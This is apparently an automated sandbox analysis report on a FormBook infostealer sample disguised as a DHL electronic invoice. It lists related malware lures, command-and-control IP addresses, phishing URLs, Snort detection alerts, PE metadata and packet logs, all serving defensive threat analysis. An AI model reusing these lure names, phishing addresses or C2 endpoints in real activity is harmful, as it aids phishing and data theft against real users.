	BBG76865646 PDF.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	34.149.87.45
	rBancofiecompro.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	34.149.87.45
	International Bank Transfer.exe	Get hash	malicious	FormBook	Browse	34.149.87.45
	rEncomendarPDF.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	34.149.87.45
	Confirm PDF.exe	Get hash	malicious	FormBook	Browse	34.149.87.45
	Banka odeme havale makbuzu 20240213 TL950000900.exe	Get hash	malicious	FormBook	Browse	34.149.87.45
	rBCPcomprobante.exe	Get hash	malicious	FormBook	Browse	34.149.87.45
	Banka odeme havale makbuzu 20240209 TL950000900.exe	Get hash	malicious	FormBook	Browse	34.149.87.45
www.baerana.com	Banka odeme havale makbuzu 20240213 TL950000900.exe	Get hash	malicious	FormBook	Browse	91.195.240.117
www.yassa-hany.online	Documento de confirmacion de orden de compra OC 1580070060.exe	Get hash	malicious	FormBook	Browse	103.224.212.213
www.yassa-hany.online	rBCPcomprobante.exe	Get hash	malicious	FormBook	Browse	103.224.212.213

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AARNET-AS-APAustralianAcademicandResearchNetworkAARNe	8holJWXFZe.exe	Get hash	malicious	Glupteba, LummaC Stealer, SmokeLoader, Stealc	Browse	103.168.172.221
	U3jqFwE41l.elf	Get hash	malicious	Mirai	Browse	157.85.242.197
	NGiwZp340s.elf	Get hash	malicious	Mirai	Browse	103.187.127.164
	https://nzeoewqeyvwdtgfoj.sunrisetrading.com.bd/?userid=Ym9uZ2t5dS5jaHVuZ0BoeXVuZGFpZWxldmF0b3IuY29t	Get hash	malicious	HTMLPhisher	Browse	103.169.160.90
	NwB5j32x4j.elf	Get hash	malicious	Mirai	Browse	150.203.238.173
	PO_No_0013011100.exe	Get hash	malicious	Remcos, DBatLoader	Browse	103.186.117.232
	Purchase_Order.exe	Get hash	malicious	Remcos, DBatLoader	Browse	103.186.117.105
	rIMG-Ponuda-Com.exe	Get hash	malicious	Remcos, GuLoader	Browse	103.183.115.241
	SGpDkfehGu.elf	Get hash	malicious	Mirai	Browse	103.182.79.16
	Contracts1.exe	Get hash	malicious	Remcos, DBatLoader	Browse	103.186.117.77
TRELLIAN-AS-APTrellianPtyLimitedAU	REQ2024029.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	103.224.212.211
	MCYq2AqNU0.exe	Get hash	malicious	Glupteba, LummaC Stealer, SmokeLoader, Stealc, Xmrig	Browse	103.224.212.34
	CERTIFICATE OF REGISTRY_pdf.exe	Get hash	malicious	FormBook, GuLoader	Browse	103.224.212.216
	VIMEKSIM PO# 1330 Confirmation_pdf.exe	Get hash	malicious	FormBook, GuLoader	Browse	103.224.212.216
	PaDQmSw2ud.dll	Get hash	malicious	Laplas Clipper	Browse	103.224.212.213
	PaDQmSw2ud.dll	Get hash	malicious	Laplas Clipper	Browse	103.224.212.213
	jqPZZhDmjh.exe	Get hash	malicious	FormBook	Browse	103.224.212.212
	Documento de confirmacion de orden de compra OC 1580070060.exe	Get hash	malicious	FormBook	Browse	103.224.212.213
	2024-09C33T37.exe	Get hash	malicious	FormBook	Browse	103.224.212.213
	z2______________________________.exe	Get hash	malicious	FormBook	Browse	103.224.212.212
SEDO-ASDE	DHL Express_5047270226.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	91.195.240.19
	DHL Receipt_2048094227.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	91.195.240.19
	rN__089734.exe	Get hash	malicious	FormBook, GuLoader	Browse	91.195.240.117
	MCYq2AqNU0.exe	Get hash	malicious	Glupteba, LummaC Stealer, SmokeLoader, Stealc, Xmrig	Browse	91.195.240.135
	Modiolus.exe	Get hash	malicious	FormBook, GuLoader	Browse	91.195.240.117
	FedEx_AWB#53053752046.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	91.195.240.19
	DHL_AWB# 5047292261.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	91.195.240.19
	EJ9wbX3RFyX19aq.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	91.195.240.117
	PO#2420009.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	91.195.240.19
	DHL_AWB#6209011980.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	91.195.240.19
TANDEMUS	https://gamma.app/docs/Mike-Han-AIT-Shared-Document-DocSpace-Online-n35yojamhwx320c	Get hash	malicious	Unknown	Browse	15.197.213.252
	https://midsoccnidnjkids-9393939.weeblysite.com/	Get hash	malicious	Unknown	Browse	15.197.193.217
	MCYq2AqNU0.exe	Get hash	malicious	Glupteba, LummaC Stealer, SmokeLoader, Stealc, Xmrig	Browse	15.197.204.56
	speke.msi	Get hash	malicious	Unknown	Browse	15.197.193.217
	https://roblox.com.ag/login?returnUrl=0604171257863528	Get hash	malicious	Unknown	Browse	15.197.130.221
	https://fonts.goggleapis.com	Get hash	malicious	Unknown	Browse	15.197.204.56
	https://atthome-102382.weeblysite.com/	Get hash	malicious	Unknown	Browse	15.197.193.217
	rl140Y9jeD.elf	Get hash	malicious	Mirai	Browse	206.8.197.226
	https://attttttttttoooo.weeblysite.com/	Get hash	malicious	Unknown	Browse	15.197.193.217
	https://edjnakqkssnmjn.weeblysite.com/	Get hash	malicious	Unknown	Browse	15.197.193.217

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DHL Factura Electronica Pendiente documento No 04BB25083.exe.log

Download File

Process:	C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1172
Entropy (8bit):	5.357042452875322
Encrypted:	false
SSDEEP:	24:3CytZWSKco4KmBs4RPT6BmFoUebIKomjKcmZ9t7J0gt/NKIl9r6dj:yyjWSU4y4RQmFoUeWmfmZ9tK8NDE
MD5:	475D428E7231D005EEA5DB556DBED03F
SHA1:	3D603ED4280E0017D1BEB124D68183F8283B5C22
SHA-256:	1314488A930843A7E1A003F2E7C1D883DB44ADEC26AC1CA096FE8DC1B4B180F5
SHA-512:	7181BDCE6DA8DA8AFD3A973BB2B0BA470468EFF32FFB338DB2662FEFA1A7848ACD87C319706B95401EA18DC873CA098DC722EA6F8B2FD04F1AABD2AEBEA97CF9
Malicious:	false
Reputation:	low
Preview:	@...e.................................^..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_44mmvcvn.agd.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fvubf43u.z5q.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ipifyeev.13a.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j5sgh1eb.iib.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.914892866012158
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	DHL Factura Electronica Pendiente documento No 04BB25083.exe
File size:	727'552 bytes
MD5:	57c1720399fe09ae9cb92000d830260a
SHA1:	5a9eccab9ebf649c94051ab9d2eaea47621ff3d6
SHA256:	d9e11bf6dbbb2e9e75574f370b57e32efd4be3b1ba193b934933515aed9b933e
SHA512:	4337ebb17161285beb5cb2a30883768e893331cc36b2380b63da1559ae83bdda56ce2c248ffa282dc83639f39c71425ff26487d772510c28b0d6c515d96db76d
SSDEEP:	12288:Gsz42MZXW/3NIJhn9kMnv5/mbSegsEZ5U3nYpIetJFwuqQb6BtDX:5xMZG/32HnyMBm+eqZe3YPJhqy6nj
TLSH:	47F4121572AC0D17D9FE6AFAB86072995BF6AA153407EBDC1DCD38EC82A1FC02505B43
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..............0......4........... ... ....@.. ....................................@................................

File Icon


Icon Hash:	36e198b4d066b842

Static PE Info

General

Entrypoint:	0x4b031a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x65D4B975 [Tue Feb 20 14:38:45 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb02c8	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xb2000	0x3198	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xb6000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xae320	0xae400	6a8df8b243212350d60418207f0978e5	False	0.9301456577295553	data	7.9217768147100704	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xb2000	0x3198	0x3200	c061139c206045469a787a62b37488c9	False	0.886171875	data	7.648485751480453	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xb6000	0xc	0x200	7eb3447bcc9cda7b2483f69342ea9edf	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xb2100	0x2b12	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9523852711772175
RT_GROUP_ICON	0xb4c24	0x14	data	1.05
RT_VERSION	0xb4c48	0x350	data	0.43514150943396224
RT_MANIFEST	0xb4fa8	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
02/21/24-14:37:39.569984	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49722	80	192.168.2.8	103.224.212.213
02/21/24-14:38:01.164210	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49723	80	192.168.2.8	103.167.199.20
02/21/24-14:34:54.459744	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49714	80	192.168.2.8	3.33.130.190
02/21/24-14:37:19.115942	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49721	80	192.168.2.8	91.195.240.117
02/21/24-14:35:55.287926	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49720	80	192.168.2.8	15.197.142.173
02/21/24-14:35:13.479776	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49716	80	192.168.2.8	34.149.87.45

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 21, 2024 14:34:54.371778965 CET	49714	80	192.168.2.8	3.33.130.190
Feb 21, 2024 14:34:54.459481001 CET	80	49714	3.33.130.190	192.168.2.8
Feb 21, 2024 14:34:54.459618092 CET	49714	80	192.168.2.8	3.33.130.190
Feb 21, 2024 14:34:54.459743977 CET	49714	80	192.168.2.8	3.33.130.190
Feb 21, 2024 14:34:54.547384024 CET	80	49714	3.33.130.190	192.168.2.8
Feb 21, 2024 14:34:54.554198027 CET	80	49714	3.33.130.190	192.168.2.8
Feb 21, 2024 14:34:54.554219961 CET	80	49714	3.33.130.190	192.168.2.8
Feb 21, 2024 14:34:54.554347038 CET	49714	80	192.168.2.8	3.33.130.190
Feb 21, 2024 14:34:54.554434061 CET	49714	80	192.168.2.8	3.33.130.190
Feb 21, 2024 14:34:54.560785055 CET	80	49714	3.33.130.190	192.168.2.8
Feb 21, 2024 14:34:54.560849905 CET	49714	80	192.168.2.8	3.33.130.190
Feb 21, 2024 14:34:54.642024040 CET	80	49714	3.33.130.190	192.168.2.8
Feb 21, 2024 14:35:13.388714075 CET	49716	80	192.168.2.8	34.149.87.45
Feb 21, 2024 14:35:13.479553938 CET	80	49716	34.149.87.45	192.168.2.8
Feb 21, 2024 14:35:13.479629040 CET	49716	80	192.168.2.8	34.149.87.45
Feb 21, 2024 14:35:13.479775906 CET	49716	80	192.168.2.8	34.149.87.45
Feb 21, 2024 14:35:13.570463896 CET	80	49716	34.149.87.45	192.168.2.8
Feb 21, 2024 14:35:13.581985950 CET	80	49716	34.149.87.45	192.168.2.8
Feb 21, 2024 14:35:13.582040071 CET	80	49716	34.149.87.45	192.168.2.8
Feb 21, 2024 14:35:13.582123041 CET	49716	80	192.168.2.8	34.149.87.45
Feb 21, 2024 14:35:13.582195997 CET	49716	80	192.168.2.8	34.149.87.45
Feb 21, 2024 14:35:13.670469999 CET	80	49716	34.149.87.45	192.168.2.8
Feb 21, 2024 14:35:55.192200899 CET	49720	80	192.168.2.8	15.197.142.173
Feb 21, 2024 14:35:55.287750006 CET	80	49720	15.197.142.173	192.168.2.8
Feb 21, 2024 14:35:55.287823915 CET	49720	80	192.168.2.8	15.197.142.173
Feb 21, 2024 14:35:55.287925959 CET	49720	80	192.168.2.8	15.197.142.173
Feb 21, 2024 14:35:55.382719994 CET	80	49720	15.197.142.173	192.168.2.8
Feb 21, 2024 14:35:55.383419037 CET	80	49720	15.197.142.173	192.168.2.8
Feb 21, 2024 14:35:55.383447886 CET	80	49720	15.197.142.173	192.168.2.8
Feb 21, 2024 14:35:55.383661985 CET	49720	80	192.168.2.8	15.197.142.173
Feb 21, 2024 14:35:55.383755922 CET	49720	80	192.168.2.8	15.197.142.173
Feb 21, 2024 14:35:55.478494883 CET	80	49720	15.197.142.173	192.168.2.8
Feb 21, 2024 14:37:18.940747976 CET	49721	80	192.168.2.8	91.195.240.117
Feb 21, 2024 14:37:19.115699053 CET	80	49721	91.195.240.117	192.168.2.8
Feb 21, 2024 14:37:19.115844011 CET	49721	80	192.168.2.8	91.195.240.117
Feb 21, 2024 14:37:19.115942001 CET	49721	80	192.168.2.8	91.195.240.117
Feb 21, 2024 14:37:19.331018925 CET	80	49721	91.195.240.117	192.168.2.8
Feb 21, 2024 14:37:19.354584932 CET	80	49721	91.195.240.117	192.168.2.8
Feb 21, 2024 14:37:19.354609013 CET	80	49721	91.195.240.117	192.168.2.8
Feb 21, 2024 14:37:19.354623079 CET	80	49721	91.195.240.117	192.168.2.8
Feb 21, 2024 14:37:19.354641914 CET	80	49721	91.195.240.117	192.168.2.8
Feb 21, 2024 14:37:19.354655027 CET	80	49721	91.195.240.117	192.168.2.8
Feb 21, 2024 14:37:19.354686022 CET	80	49721	91.195.240.117	192.168.2.8
Feb 21, 2024 14:37:19.354685068 CET	49721	80	192.168.2.8	91.195.240.117
Feb 21, 2024 14:37:19.354707956 CET	80	49721	91.195.240.117	192.168.2.8
Feb 21, 2024 14:37:19.354749918 CET	49721	80	192.168.2.8	91.195.240.117
Feb 21, 2024 14:37:19.354749918 CET	49721	80	192.168.2.8	91.195.240.117
Feb 21, 2024 14:37:19.354759932 CET	80	49721	91.195.240.117	192.168.2.8
Feb 21, 2024 14:37:19.354774952 CET	80	49721	91.195.240.117	192.168.2.8
Feb 21, 2024 14:37:19.354799032 CET	49721	80	192.168.2.8	91.195.240.117
Feb 21, 2024 14:37:19.354834080 CET	80	49721	91.195.240.117	192.168.2.8
Feb 21, 2024 14:37:19.354870081 CET	49721	80	192.168.2.8	91.195.240.117
Feb 21, 2024 14:37:19.529478073 CET	80	49721	91.195.240.117	192.168.2.8
Feb 21, 2024 14:37:19.529527903 CET	80	49721	91.195.240.117	192.168.2.8
Feb 21, 2024 14:37:19.529576063 CET	49721	80	192.168.2.8	91.195.240.117
Feb 21, 2024 14:37:19.529583931 CET	80	49721	91.195.240.117	192.168.2.8
Feb 21, 2024 14:37:19.529622078 CET	80	49721	91.195.240.117	192.168.2.8
Feb 21, 2024 14:37:19.529659033 CET	80	49721	91.195.240.117	192.168.2.8
Feb 21, 2024 14:37:19.529673100 CET	49721	80	192.168.2.8	91.195.240.117
Feb 21, 2024 14:37:19.529696941 CET	80	49721	91.195.240.117	192.168.2.8
Feb 21, 2024 14:37:19.529733896 CET	80	49721	91.195.240.117	192.168.2.8
Feb 21, 2024 14:37:19.529758930 CET	49721	80	192.168.2.8	91.195.240.117
Feb 21, 2024 14:37:19.529772997 CET	80	49721	91.195.240.117	192.168.2.8
Feb 21, 2024 14:37:19.529850006 CET	49721	80	192.168.2.8	91.195.240.117
Feb 21, 2024 14:37:19.529876947 CET	49721	80	192.168.2.8	91.195.240.117
Feb 21, 2024 14:37:19.704480886 CET	80	49721	91.195.240.117	192.168.2.8
Feb 21, 2024 14:37:39.413003922 CET	49722	80	192.168.2.8	103.224.212.213
Feb 21, 2024 14:37:39.569685936 CET	80	49722	103.224.212.213	192.168.2.8
Feb 21, 2024 14:37:39.569852114 CET	49722	80	192.168.2.8	103.224.212.213
Feb 21, 2024 14:37:39.569983959 CET	49722	80	192.168.2.8	103.224.212.213
Feb 21, 2024 14:37:39.763426065 CET	80	49722	103.224.212.213	192.168.2.8
Feb 21, 2024 14:37:39.763452053 CET	80	49722	103.224.212.213	192.168.2.8
Feb 21, 2024 14:37:39.763556004 CET	49722	80	192.168.2.8	103.224.212.213
Feb 21, 2024 14:37:39.763628006 CET	49722	80	192.168.2.8	103.224.212.213
Feb 21, 2024 14:37:39.920295954 CET	80	49722	103.224.212.213	192.168.2.8
Feb 21, 2024 14:38:00.807887077 CET	49723	80	192.168.2.8	103.167.199.20
Feb 21, 2024 14:38:01.163971901 CET	80	49723	103.167.199.20	192.168.2.8
Feb 21, 2024 14:38:01.164079905 CET	49723	80	192.168.2.8	103.167.199.20
Feb 21, 2024 14:38:01.164210081 CET	49723	80	192.168.2.8	103.167.199.20
Feb 21, 2024 14:38:01.519831896 CET	80	49723	103.167.199.20	192.168.2.8
Feb 21, 2024 14:38:01.520893097 CET	80	49723	103.167.199.20	192.168.2.8
Feb 21, 2024 14:38:01.520906925 CET	80	49723	103.167.199.20	192.168.2.8
Feb 21, 2024 14:38:01.520994902 CET	49723	80	192.168.2.8	103.167.199.20
Feb 21, 2024 14:38:01.521051884 CET	49723	80	192.168.2.8	103.167.199.20
Feb 21, 2024 14:38:01.876672029 CET	80	49723	103.167.199.20	192.168.2.8

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 21, 2024 14:34:54.198509932 CET	59492	53	192.168.2.8	1.1.1.1
Feb 21, 2024 14:34:54.370790005 CET	53	59492	1.1.1.1	192.168.2.8
Feb 21, 2024 14:35:13.182126045 CET	55690	53	192.168.2.8	1.1.1.1
Feb 21, 2024 14:35:13.387804985 CET	53	55690	1.1.1.1	192.168.2.8
Feb 21, 2024 14:35:55.057487011 CET	65030	53	192.168.2.8	1.1.1.1
Feb 21, 2024 14:35:55.187500000 CET	53	65030	1.1.1.1	192.168.2.8
Feb 21, 2024 14:36:15.478955030 CET	60254	53	192.168.2.8	1.1.1.1
Feb 21, 2024 14:36:15.576605082 CET	53	60254	1.1.1.1	192.168.2.8
Feb 21, 2024 14:36:37.307163000 CET	52303	53	192.168.2.8	1.1.1.1
Feb 21, 2024 14:36:37.538652897 CET	53	52303	1.1.1.1	192.168.2.8
Feb 21, 2024 14:36:57.682596922 CET	53294	53	192.168.2.8	1.1.1.1
Feb 21, 2024 14:36:57.778846025 CET	53	53294	1.1.1.1	192.168.2.8
Feb 21, 2024 14:37:18.773803949 CET	60109	53	192.168.2.8	1.1.1.1
Feb 21, 2024 14:37:18.939240932 CET	53	60109	1.1.1.1	192.168.2.8
Feb 21, 2024 14:37:39.182940006 CET	51510	53	192.168.2.8	1.1.1.1
Feb 21, 2024 14:37:39.411945105 CET	53	51510	1.1.1.1	192.168.2.8
Feb 21, 2024 14:37:59.576106071 CET	62546	53	192.168.2.8	1.1.1.1
Feb 21, 2024 14:38:00.572196007 CET	62546	53	192.168.2.8	1.1.1.1
Feb 21, 2024 14:38:00.806723118 CET	53	62546	1.1.1.1	192.168.2.8
